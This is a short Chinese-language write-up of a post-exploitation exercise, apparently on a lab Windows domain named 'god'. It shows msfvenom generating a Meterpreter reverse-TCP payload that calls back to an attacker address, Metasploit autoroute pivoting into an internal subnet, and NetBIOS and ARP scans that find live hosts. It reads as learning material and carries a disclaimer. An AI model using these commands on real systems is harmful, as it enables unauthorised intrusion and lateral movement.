拿到win7的shell之后,執行下ipconfig,發現win7有兩塊網卡,外網ip為:192.168.174.135,內網ip為:192.168.52.143:
查看當前登錄域及登錄用戶信息:net config Workstation
查看域成員:net view /domain:god。不知道為啥查看不了。。。
我們知道win7在一個名為god的域里,也知道了內網ip的網段,接下來找出該主機所在內網網段的其他存活主機。
1. 用msf生成木馬傳到win7上並執行該文件,得到msf的session:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=4446 -f exe -o shell.exe
2. 配置靜態路由:
run autoroute -s 192.168.52.0/24
3. 存活主機探測
試了一下,下面兩種方法都可以
run auxiliary/scanner/netbios/nbname RHOSTS=192.168.52.0/24 run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24
找到兩個存活主機:192.168.52.138(主機名為OWA)和192.168.52.141(GOD域上的主機名為ROOT-TVI862UBEH)
本文僅用於技術學習和交流,嚴禁用於非法用途,否則產生的一切后果自行承擔。
如需轉載,請注明出處,這是對他人勞動成果的尊重。